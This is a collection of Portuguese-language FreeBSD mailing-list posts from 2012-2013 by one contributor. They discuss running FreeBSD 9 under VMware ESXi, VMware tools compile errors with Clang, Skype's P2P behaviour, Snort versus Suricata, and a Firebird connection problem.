> *FreeBSD mail.domain.local 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3
> 07:15:25 UTC 2012 r...@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
> i38
>
> --
> Abs,
>
> Bruno Oliveira



Fala Bruno, beleza?

Cara, no final de 2012 eu migrei um BSD para um ambiente virtualizado (Dell
PowerEdge, discos SAS 15K RPM, rodando ESXi 5.1)... usei FreeBSD 9 amd64
(com ZFS)... desde então, não tenho o reclamar... as poucas vezes que
precisei desligar foi por causa de energia, e olha que rodo muita coisa:

* Dansguardian;
* Servidor web com vários sites, proxy reverso, etc.;
* Firewall com controle de banda;
* OpenVPN com 6 filiais penduradas;
* Samba;
* OpenFire (Java, bem pesado);
* Banco de dados (Postgres);

O único cuidado que tive foi instalar as atualizações do ESXi 5 (se não me
engano tem um patch que corrige uns bugs, entre eles o auto-start das
máquinas que não funciona), e usei o openvmwaretools que está no ports
alguns tunnigs que já usava no pc anterior no sysctl e loader.conf.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD 9 congelando

[Welkson Renny de Medeiros]

Em 6 de março de 2013 12:08, Leonardo Augusto  escreveu:

> 2013/3/4 Paulo Henrique :
> > Em 4 de março de 2013 17:08, Bruno Oliveira 
> escreveu:
> >
> >> Lista, boa tarde.
> >>
> >> Estou utilizando o FreeBSD 9 virtualizado com VMware vSphere em um dos
> meus
> >> servidores de correio eletrônico, hoje o servido já congelou o sistema
> duas
> >> vezes, na primeira apresentando erro de acesso a disco, executei o fsck
> e
> >> resolveu o problema e agora o servidor congelou novamente sem aparecer
> >> nenhum alerta de erro, onde devo procurar para tentar encontrar a
> origem do
> >> problema?
> >>
> >> Desde já agradeço a ajuda.
> >>
> >> --
> >> Abs,
> >>
> >> Bruno Oliveira
>


Estou rodando o FreeBSD 9.1 amd64 no ESXi 5.1 (com OpenVMWARE Tools) a
alguns meses... não tenho o que reclamar.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Skype 4 no FreeBSD

[Welkson Renny de Medeiros]

Em 30 de janeiro de 2013 13:18, Ricardo Carlini Sperandio <
rcarl...@gmail.com> escreveu:

> Uai,
>mas o skype sempre rodou no linux, a diferença é que antes ele suportava
> tanto o oss como o alsa como o pulseaudio, agora é alsa ou nada. O problema
> não é o rodar nos linux mas sim nos BSD, ou então num linux sobre
> ARM/sparc, etc...
>
> --
> Ricardo Carlini Sperandio
>


Pois é, sempre vi Linux lá na lista de downloads do skype... mas confesso
que nunca precisei instalar Skype em ambientes *nix.

Pelo jeito a Microsoft depois que comprou o Skype já começou a "dificultar"
a vida de quem não usa Windows...

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Skype 4 no FreeBSD

[Welkson Renny de Medeiros]

Em 30 de janeiro de 2013 12:26, Ricardo Carlini Sperandio <
rcarl...@gmail.com> escreveu:

> 2013/1/24 Tiago Ribeiro 
>
> > Em 24 de janeiro de 2013 09:22, Felipe Nogueira Oliva <
> > felipe.n...@gmail.com
> > > escreveu:
> >
> > > Eu ja tentei de tudo, ate emular pelo Wine.
>


Estava acompanhando no twitter as notícias sobre o Campus Party e vi isso:
"TechEd Brasil @techedbrasil

Você usa Linux e gostaria de utilizar Skype? Isso não é mais um problema.
Agora o Skype roda no Linux!#cpbr6 Palco Sócrates!"

Se alguém tiver no Campus Party, vai lá no stand da Microsoft e diga que
isso é mentira =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

freebsd@fug.com.br

[Welkson Renny de Medeiros]

Em 25 de janeiro de 2013 15:25, Lucas Dias  escreveu:

> Pode até funcionar, mas googlando por esses dias, achei que o Skype
> funciona na base P2P.
>
> Conversando com um amigo, ele me disse que liberou apenas para uma estação
> (The Boss) na rede dele, e depois de alguns dias, ele viu por coincidência,
> um outro usuário usando. Investigou e viu que só passava pelo firewall o o
> IP liberado para usar o Skype. Percebeu também, por coincidência, que
> quando o IP liberado não estava em uso, ou seja, The Boss não estava no
> prédio, o Skype realmente não funcionava.
>
> Resultado: Se apenas uma maquina for liberada, ela servirá de proxy para as
> outras.  Sinistro =)
>
> Vou fazer um PoC sobre isso e confirmo depois com meus testes.
>
> Além de P2P, ainda criptografa... to vendo que a solução será daqui a pouco
> da própria Skype (MS).
> --
> .:: Lucas Dias
> .:: OS3 Soluções em TI
> .:: (82) 8813-1494 / 8111-2288
> .:: Antes de imprimir, veja se realmente é necessário!!!
>
>

Lucas, percebi a mesma coisa a alguns anos.

Skype é pior que vírus =)

Esse paper é um pouco antigo, mas talvez ajude a matar a curiosidade:
http://www1.cs.columbia.edu/~library/TR-repository/reports/reports-2004/cucs-039-04.pdf

Nesse paper acima logo no começo informa o seguinte:
"Any node with a public IP address having
sufficient CPU, memory, and network bandwidth is a candidate to
become a super node"

Alguns outros:
http://www.ossir.org/windows/supports/2005/2005-11-07/EADS-CCR_Fabrice_Skype.pdf
http://lib.tkk.fi/Dipl/2007/urn009990.pdf
http://www.tlc-networks.polito.it/oldsite/mellia/papers/CR_skype_TMM.pdf

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang

[Welkson Renny de Medeiros]

2013/1/10 Welinaldo Lopes Nascimento 

> Complementando o erro que ocorre ao compilar o vmblock do vmware-tools:
>
> Warning: Object directory not changed from original
> //vmware-tools-distrib/lib/modules/source/vmblock-only @ ->
> /usr/src/sys machine -> /usr/src/sys/amd64/includex86 ->
> /usr/src/sys/x86/include
> awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -p
> awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -q
> awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -h
> cc -O2 -pipe  -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL
> -DKLD_MODULE -nostdinc   -I. -I@ -I@/contrib/altq -finline-limit=8000
> --param inline-unit-growth=100 --param large-function-growth=1000
> -fno-common  -fno-omit-frame-pointer -mcmodel=kernel -mno-red-zone -mno-mmx
> -mno-sse -msoft-float  -fno-asynchronous -unwind-tables -ffreestanding
> -fstack-protector -std=iso9899:1999 -fstack-protector -Wall
> -Wredundant-decls -Wnested-externs -Wstrict-prototypes
>  -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual  -Wundef
> -Wno-pointer-sign -fformat-extensions  -Wmissing-include-dirs
> -fdiagnostics-show-option   -c block.c
> cc -O2 -pipe  -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL
> -DKLD_MODULE
> (.)
> vfsops.c:387: error: 'VFS_STATFS' undeclared (first use in this function)
> vfsops.c: At top level:
> vfsops.c:427: error: conflicting types for 'VMBlockVFSSync'
> vfsops.c:70: error: previous declaration of 'VMBlockVFSSync' was here
> *** [vfsops.o] Error code 1
>


Wellinaldo,

Se puder, posta o erro que ocorre ao tentar compilar o kernel sem clang
(alteração feita no make.conf).

Provavelmente esse seu erro é porque esse código não compila com clang, só
com GCC.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang

[Welkson Renny de Medeiros]

Em 10 de janeiro de 2013 09:38, Welkson Renny de Medeiros  escreveu:

> Senhores, bom dia!
>
> A cerca de 15 dias migrei um BSD antigo (FreeBSD 7.0 i386) para um novo
> hardware (Dell com HD SAS 15K RPM com RAID 1 usando controladora Perc,
> etc.). Como o novo hardware é suportado pelo VMWARE, e já uso VMWARE ESXi a
> algum tempo com outros SO`s (Linux, Windows), decidi então instalar o
> FreeBSD virtualizado.
>
> Baixei o FreeBSD 9.1 (ainda não tinha sido lançado a ISO oficial, por
> sorte que quando lançaram não houve qualquer mudança), e instalei a versão
> AMD 64 sobre o ESXi 5.1.
>
> Conversando sobre o processo de instalação com o Wellinaldo (GTalk), ele
> me sugeriu usar o ZFS (eu tinha a impressão que ZFS era meio "gambiarra",
> mas muita gente já está usando em produção, então vamos lá...)... instalei
> com ZFS, etc.
>
> Chegou na parte de instalar o VMWARE Tools... como a VMWARE suporte o
> FreeBSD 9 (no meu caso é 9.1, não sei como fica), decidi então não usar o
> Open-VM-Tools (como o ESXi 5.1 foi lançado a pouco tempo, não sei como está
> o suporte pra ele). Montei o CD-ROM com a instalação do VMWARE-TOOLS, segui
> os passos descritos nesse site:
>
> http://www.rhyous.com/2012/05/09/installing-vmware-tools-on-freebsd-9-without-xorg/
>
> Observe que eles recomendam desativar o clang no MAKE.CONF (ou seja, usar
> o GCC puro), e recompilar o kernel... eu fiz isso, tentei recompilar, e foi
> exibido um erro exatamente na linha do make.conf que desativa o Clang (não
> lembro o erro, mas para o momento não vem ao caso).
>
> Tentei algumas dicas da internet, não funcionou... usei então o
> Open-VMWARE-Tools do ports... compilou tudo certinho, carregou os módulos,
> configurei o RC.CONF, etc já está em produção a algumas semanas, e está
> tudo funcionando sem problema algum.
>
> Minha pergunta é a seguinte: o que vocês acham mais seguro? usar o
> Open-VMWARE-Tools e seus possíveis bugs [1], ou tentar resolver esse
> problema do make.conf usar a distro oficial da vmware? (lembrando que eles
> desativam o clang, e pelo que li, o clang será o C oficial do BSD daqui pra
> frente... em resumo: os erros que alguns ports tem hoje por não serem
> compatíveis com clang pode ocorrer ao contrário no futuro, ports quebrarem
> porque não rodam com GCC).
>
> Espero ter sido claro.
>
> Welkson Renny
>


Esqueci de postar o link para os tickets abertos para open-vm-tools:
http://sourceforge.net/tracker/?limit=25&func=&group_id=204462&atid=989708&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=&assignee=&status=1&category=&artgroup=&submitter=&keyword=&artifact_id=&submit=Filter

Monte de coisa para BSD... mas pelo que vi, o software vem sendo atualizado
constantemente.

Welkson Renny
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?

[Welkson Renny de Medeiros]

Em 2 de janeiro de 2013 18:52, Antônio Pessoa escreveu:

> No endereço abaixo [1] você vai encontrar um material do próprio
> Patrick Tracanelli sobre os dois, com comparativos bem interessantes,
> acredito que valha a pena você dar uma olhada.
>
> [1] http://www.bhack.com.br/talks/Patrick/BHACK2.pdf
>
> --
> Atenciosamente,
>
> Antônio Pessoa
>



Baixei os slides do BHack a algumas semanas mas ainda não tinha analisado :(

Cara, vendo as explicações do Patrick... o Suricata parece muito
interessante! =)

Amanhã vou instalar e dar uma brincada.

Obrigado pela dica meu amigo!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?

[Welkson Renny de Medeiros]

Em 2 de janeiro de 2013 12:05, Welkson Renny de Medeiros
escreveu:

> Senhores, bom dia!
>
> Estou a alguns dias implantando um novo servidor (FreeBSD 9.1 amd64 sob
> ESXi 5.1), e cheguei na parte de segurança.
>
> No servidor antigo eu tinha Snort + OSSEC (com Active Response) + Base...
> as versões eram bem antigas... decidi então nesse novo servidor (com BSD
> 9.1) usar as mais atuais...
>
> A primeira bronca foi logo com o Snort, que nessa versão não mais permite
> fazer output em banco de dados [1]... instalei o tal do "Barnyard2", mas
> ainda não consegui gerar os logs do Snort no padrão que o Barnyard entende
> (Unified2)... quando ativo qualquer tipo de "output", os logs deixam de ser
> gerados... com todos os outputs comentados, pelo menos o
> /var/log/snort/alert funfa direitinho (mas o Barnyard não interpreta isso).
>
> A algum tempo vi o Patrick comentando sobre o Suricata, que me parece ser
> um "fork" do Snort. Alguém tem usado? output database funfa direitinho?
> compatível com as "rules" do Snort?
>
> [1] http://blog.snort.org/2012/07/database-output-is-dead-rip.html
>
> Feliz 2013 a todos! =)
>
> Welkson Renny
> Natal/RN
>



Fazendo mais buscas encontrei algumas respostas.

De acordo com o link abaixo, Emerging Threats não funciona no Snort (eu uso
essas rules) - SO rules não conhecia:
http://www.aldeid.com/wiki/Suricata-vs-snort#Rules
http://www.aldeid.com/wiki/EN:Snort/Rules/SO_Rules

Não vi "database" na lista de Outputs:
http://suricata-ids.org/features/all-features/

Qualquer comentário sobre Snort x Suricata será bem vindo.

Welkson Renny
Natal/RN
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] O melhor presente de final de ano. - FreeBSD 9.1-RELEASE

[Welkson Renny de Medeiros]

Em 31 de dezembro de 2012 08:21, Marcelo Gondim escreveu:

> Oi Celso,
>
> Eu chequei as MD5 dos disc1 tanto amd64 e i386 e são as mesmas de quando
> saiu, ou seja, são as mesmas ISOs. Não sei as outras.  :)
>
> []'s
> Gondim
>
>

Ufa! Baixei o 9.1 amd64 e instalei no ESXi 5.1 a poucos dias! Está em
produção com ZFS! Uma bala! =)

Estava com medo de ocorrer alguma mudança no lançamento oficial e ter que
reinstalar (ou fazer algum tipo de update).

Feliz 2013 1 todos!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] Mac Ports

[Welkson Renny de Medeiros]

Em 18 de dezembro de 2012 08:15, Frederico Terra Boechat  escreveu:

> Tem o fink, já usei aqui mas preferi o macports.
>
> Dá uma inchada no Mac OS por conta do XCode mas me teve bastante serventia
> :)
>
> Mac OS, pra mim, é o melhor dos dois mundos, rodo um BSD ao mesmo tempo em
> que eu tenho um desktop BOM
>
> Frederico Boechat
>



Uso o HomeBrew, muito bom.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Firebird não Comunica

[Welkson Renny de Medeiros]

Em 15 de dezembro de 2012 00:05, Luzivan  escreveu:

> Renny, procura os logs do firebird e cola aqui, vai nos ajudar. Uma coisa q
> nao entendi é o que tem haver o samba e permissao 777 nas pastaz, n é
> necessario o samba para fb funcionar. Confirma se o servico ta ouvindo na
> porta 3050, faz um telnet nesta porta a partir de outro pc da rede, cria um
> banco de teste e acessa usando um client qualquer.
> Em 13/12/2012 17:19, "Welkson Renny de Medeiros" 
> escreveu:
>
>

Oi Luzivan, beleza?

Na verdade quem está com problemas é o "Anker projeto" (o cara que abriu o
tópico). Eu estou tentando ajudar.

Confesso que a uns 4 ou 5 anos tentei usar Firebird no FreeBSD e não tive
boas experiências (tudo bem que o sistema usava diversas UDF's como rFUNC,
etc.)... na época os ports de Firebird eram bastante desatualizados,
problemas com semáforos, etc... enfim, pra Firebird eu optei por Linux e
roda tranquilo até hoje. Hoje a realidade talvez seja outra, não sei.

Eu também não entendi a ideia do 777 no Samba... o Firebird não precisa de
Samba.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd